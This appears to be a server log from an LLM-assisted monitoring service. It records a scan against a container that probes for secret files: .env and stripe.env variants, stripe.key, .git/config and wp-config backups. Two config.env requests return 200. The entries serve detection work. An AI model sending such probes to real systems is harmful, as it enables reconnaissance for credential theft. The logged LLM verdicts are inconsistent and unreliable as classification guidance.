Mar 20 15:23:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:23:46.874324 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to a hidden environment file path (/.vscode/.env) returning 404 is a common probe to detect sensitive files; not successful but warrants attention. Line=2026-03-20T15:16:02.606059050Z GET /.vscode/.env 404 0.862 ms - 9
Mar 20 15:23:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:23:52.707736 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 15:23:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:23:52.707770 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to a hidden environment file (.env) under node_modules is commonly probed by attackers to discover sensitive configuration. Line=2026-03-20T15:16:02.643434059Z GET /node_modules/.env 404 1.035 ms - 9
Mar 20 15:23:55 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:23:55.939217 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 15:23:55 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:23:55.939254 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to /config.env is unusual and often indicates probing for sensitive configuration; a 404 on this path is common for scans but warrants attention. Line=2026-03-20T15:16:02.705977200Z GET /config.env 404 4.647 ms - 9
Mar 20 15:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:24:01.962702 [observer] Pipeline: processed=7162 pattern_hits=6625 llm_calls=537 llm_errors=3 learned=5
Mar 20 15:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:24:01.962735 [observer] Patterns: hash=6611 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=537
Mar 20 15:24:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:24:05.213967 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 15:24:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:24:05.214001 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to /api/config.env can indicate attempts to retrieve sensitive configuration data; while the request returned 200, the endpoint itself is commonly sensitive and may be misused. Line=2026-03-20T15:16:02.720484598Z GET /api/config.env 200 12.437 ms - 83
Mar 20 15:24:10 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:24:10.094284 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.64 action=alert pattern_type=
Mar 20 15:24:10 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:24:10.094324 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to /api/shared/config.env could indicate an attempt to retrieve sensitive environment configuration; status 200 does not guarantee legitimacy, so warrants monitoring. Line=2026-03-20T15:16:02.725181141Z GET /api/shared/config.env 200 2.771 ms - 83
Mar 20 15:24:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:24:13.685785 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.85 action=allow pattern_type=prefix
Mar 20 15:24:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:24:13.685822 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:24:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:24:17.648337 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:24:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:24:17.648376 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to /config/stripe.env 404 from a web request could indicate probing for sensitive config files. Line=2026-03-20T15:16:02.775682247Z GET /config/stripe.env 404 0.666 ms - 9
Mar 20 15:24:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:24:21.786083 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 15:24:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:24:21.786119 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=HTTP 404 for a request targeting a sensitive file path (.circleci/stripe.env) suggests probing for confidential environment configuration; not a successful breach but warrants attention. Line=2026-03-20T15:16:02.788646554Z GET /.circleci/stripe.env 404 0.696 ms - 9
Mar 20 15:24:27 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:24:27.403591 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.60 action=alert pattern_type=
Mar 20 15:24:27 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:24:27.403631 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=HTTP 404 on /config.js could indicate probing for misconfig or missing assets; not definitive attack but warrants attention. Line=2026-03-20T15:16:02.889108555Z GET /config.js 404 3.172 ms - 9
Mar 20 15:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:24:31.939970 [observer] Pipeline: processed=7170 pattern_hits=6627 llm_calls=543 llm_errors=3 learned=5
Mar 20 15:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:24:31.939995 [observer] Patterns: hash=6613 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=543
Mar 20 15:24:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:24:32.574976 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 15:24:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:24:32.575011 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to /stripe.env returned 404, which could indicate probing for sensitive files or misconfigured routing Line=2026-03-20T15:16:02.893260840Z GET /stripe.env 404 3.504 ms - 9
Mar 20 15:24:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:24:36.945759 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 15:24:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:24:36.945800 [analyzer] Source hint mismatch: LLM says "webserver", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:24:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:24:41.990703 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:24:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:24:41.990741 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to /env.js returning 404 can indicate probing for environment exposure or misconfiguration rather than a normal user request. Line=2026-03-20T15:16:02.907226198Z GET /env.js 404 0.698 ms - 9
Mar 20 15:24:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:24:47.687532 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 15:24:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:24:47.687570 [analyzer] Source hint mismatch: LLM says "docker", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:24:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:24:52.104722 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 15:24:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:24:52.104755 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:24:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:24:56.199783 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 15:24:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:24:56.199823 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:25:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:25:00.726617 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 15:25:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:25:00.726657 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:25:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:25:02.004792 [observer] Pipeline: processed=7179 pattern_hits=6629 llm_calls=550 llm_errors=3 learned=5
Mar 20 15:25:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:25:02.004943 [observer] Patterns: hash=6615 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=550
Mar 20 15:25:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:25:05.176830 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 15:25:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:25:05.176874 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:25:10 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:25:10.586656 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 15:25:10 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:25:10.586694 [analyzer] Source hint mismatch: LLM says "vite", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:25:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:25:14.902769 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 15:25:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:25:14.902805 [analyzer] Confidence 0.75 too low for pattern learning (need 0.85+)
Mar 20 15:25:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:25:21.489823 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 15:25:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:25:21.489871 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:25:27 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:25:27.395095 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 15:25:27 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:25:27.395128 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:25:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:25:30.519454 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.90 action=allow pattern_type=prefix
Mar 20 15:25:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:25:30.519492 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:25:31.938420 [observer] Pipeline: processed=7189 pattern_hits=6633 llm_calls=556 llm_errors=3 learned=5
Mar 20 15:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:25:31.938445 [observer] Patterns: hash=6619 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=556
Mar 20 15:25:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:25:34.400978 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:25:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:25:34.401012 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to env.json returned 404, which can indicate probing for environment exposure or sensitive files. Line=2026-03-20T15:16:03.233773776Z GET /env.json 404 2.630 ms - 9
Mar 20 15:25:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:25:38.273871 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 15:25:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:25:38.273923 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:25:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:25:43.531954 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 15:25:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:25:43.532000 [analyzer] Source hint mismatch: LLM says "http_server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:25:48 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:25:48.738713 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 15:25:48 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:25:48.738750 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to a potential environment map file (__env.js.map) can indicate probing for deployment details; not definitive malicious activity but worth alerting. Line=2026-03-20T15:16:03.301741694Z GET /__env.js.map 404 0.731 ms - 9
Mar 20 15:25:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:25:52.426625 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.92 action=allow pattern_type=prefix
Mar 20 15:25:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:25:52.426662 [analyzer] Source hint mismatch: LLM says "docker", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:25:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:25:56.339553 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 15:25:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:25:56.339588 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:26:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:26:00.411030 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.85 action=allow pattern_type=prefix
Mar 20 15:26:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:26:00.411069 [analyzer] Source hint mismatch: LLM says "docker", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:26:01.997636 [observer] Pipeline: processed=7198 pattern_hits=6635 llm_calls=563 llm_errors=3 learned=5
Mar 20 15:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:26:01.997666 [observer] Patterns: hash=6621 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=563
Mar 20 15:26:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:26:04.503005 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 15:26:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:26:04.503041 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to /.git/config is a common probing target to locate sensitive repository configuration; while not definitive, it indicates suspicious intent. Line=2026-03-20T15:16:03.446111265Z GET /.git/config 404 1.110 ms - 9
Mar 20 15:26:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:26:08.610028 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:26:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:26:08.610065 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to the repository metadata file /.git/HEAD can indicate probing for source code or misconfigured exposure. Not clearly malicious yet, but warrants attention. Line=2026-03-20T15:16:03.468960802Z GET /.git/HEAD 404 1.409 ms - 9
Mar 20 15:26:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:26:13.169937 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.60 action=alert pattern_type=
Mar 20 15:26:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:26:13.169975 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to wp-config.php.bak that returned 404 suggests probing for sensitive configuration backups; unusual access pattern Line=2026-03-20T15:16:03.499347245Z GET /wp-config.php.bak 404 0.595 ms - 9
Mar 20 15:26:16 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:26:16.889945 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.60 action=alert pattern_type=
Mar 20 15:26:16 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:26:16.889988 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access attempt to a sensitive file wp-config.php.old returning 404 suggests probing for configuration files. Line=2026-03-20T15:16:03.534592218Z GET /wp-config.php.old 404 3.247 ms - 9
Mar 20 15:26:25 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:26:25.060265 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 15:26:25 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:26:25.060305 [analyzer] Source hint mismatch: LLM says "webserver", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:26:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:26:30.337302 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.68 action=alert pattern_type=
Mar 20 15:26:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:26:30.337344 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to wp-config.php.txt is a common probing pattern to locate WordPress configuration or sensitive files; 404 response suggests the resource doesn't exist, but the pattern is indicative of unauthorized probing. Line=2026-03-20T15:16:03.538514809Z GET /wp-config.php.txt 404 1.652 ms - 9
Mar 20 15:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:26:31.938379 [observer] Pipeline: processed=7208 pattern_hits=6639 llm_calls=569 llm_errors=3 learned=5
Mar 20 15:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:26:31.938403 [observer] Patterns: hash=6625 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=569
Mar 20 15:26:35 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:26:35.796810 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:26:35 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:26:35.796839 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to /wp-config.php.save returning 404 suggests probing for sensitive WordPress configuration files. Line=2026-03-20T15:16:03.588924942Z GET /wp-config.php.save 404 1.494 ms - 9
Mar 20 15:26:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:26:40.853979 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 15:26:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:26:40.854016 [analyzer] Source hint mismatch: LLM says "nginx_access", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:26:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:26:47.292931 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 15:26:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:26:47.292968 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access attempt to wp-config.php with a 404 response is a common probe for sensitive file exposure. Line=2026-03-20T15:16:03.673483715Z GET /wp-config.php~ 404 0.581 ms - 9
Mar 20 15:26:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:26:51.996201 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:26:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:26:51.996238 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to /wp-config is a common probe to locate sensitive WordPress configuration; 404 indicates not found but attempt is indicative of automated scanning. Line=2026-03-20T15:16:03.684971338Z GET /wp-config 404 0.639 ms - 9
Mar 20 15:26:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:26:57.607672 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:26:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:26:57.607709 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=External probe for wp-config.txt resulting in 404; common reconnaissance to locate WordPress config. Line=2026-03-20T15:16:03.713092980Z GET /wp-config.txt 404 0.641 ms - 9
Mar 20 15:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:27:01.950876 [observer] Pipeline: processed=7215 pattern_hits=6641 llm_calls=574 llm_errors=3 learned=5
Mar 20 15:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:27:01.950906 [observer] Patterns: hash=6627 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=574
Mar 20 15:27:07 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:27:07.825518 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:27:07 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:27:07.825556 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to wp-config.old is a common probing pattern targeting WordPress configurations; could indicate attempted discovery of sensitive files. Line=2026-03-20T15:16:03.716742468Z GET /wp-config.old 404 0.915 ms - 9
Mar 20 15:27:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:27:13.838174 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:27:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:27:13.838207 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=HTTP GET to a potentially sensitive file wp-content/debug.log returning 404; common probing pattern for sensitive file disclosure attempts. Line=2026-03-20T15:16:03.717720435Z GET /wp-content/debug.log 404 1.219 ms - 9
Mar 20 15:27:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:27:17.191778 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 15:27:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:27:17.191818 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:27:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:27:23.034875 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 15:27:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:27:23.034918 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request for a source map file (config.js.map) returning 404 can indicate probing for source artifacts, which is common in reconnaissance but not necessarily malicious. Line=2026-03-20T15:16:03.764119799Z GET /config.js.map 404 0.655 ms - 9
Mar 20 15:27:27 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:27:27.994798 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.60 action=alert pattern_type=
Mar 20 15:27:27 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:27:27.994836 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=HTTP 404 on a WordPress REST API endpoint may indicate probing or misconfiguration; not clearly malicious but warrants attention. Line=2026-03-20T15:16:03.776824876Z GET /wp-json/wc/v2/payment_gateways 404 0.652 ms - 9
Mar 20 15:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:27:31.937842 [observer] Pipeline: processed=7224 pattern_hits=6645 llm_calls=579 llm_errors=3 learned=5
Mar 20 15:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:27:31.937870 [observer] Patterns: hash=6631 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=579
Mar 20 15:27:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:27:34.117478 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:27:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:27:34.117516 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to a WordPress REST API endpoint returning 404 could indicate probing or misconfiguration. Line=2026-03-20T15:16:03.844036127Z GET /wp-json/wc/v3/settings/checkout 404 0.902 ms - 9
Mar 20 15:27:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:27:38.779582 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.68 action=alert pattern_type=
Mar 20 15:27:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:27:38.779621 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Single 404 on admin-ajax.php can indicate probing or automated scans targeting WordPress admin endpoints. Not definitively malicious but warrants monitoring. Line=2026-03-20T15:16:03.882930473Z GET /wp-admin/admin-ajax.php 404 0.940 ms - 9
Mar 20 15:27:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:27:43.399636 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 15:27:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:27:43.399676 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:27:48 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:27:48.351870 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 15:27:48 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:27:48.351903 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to a sensitive path ( /stripe.key ) that returned 404. Could indicate probing for sensitive files. Line=2026-03-20T15:16:03.904505319Z GET /stripe.key 404 1.421 ms - 9
Mar 20 15:27:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:27:52.733337 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 15:27:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:27:52.733477 [analyzer] Source hint mismatch: LLM says "nginx-webserver", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
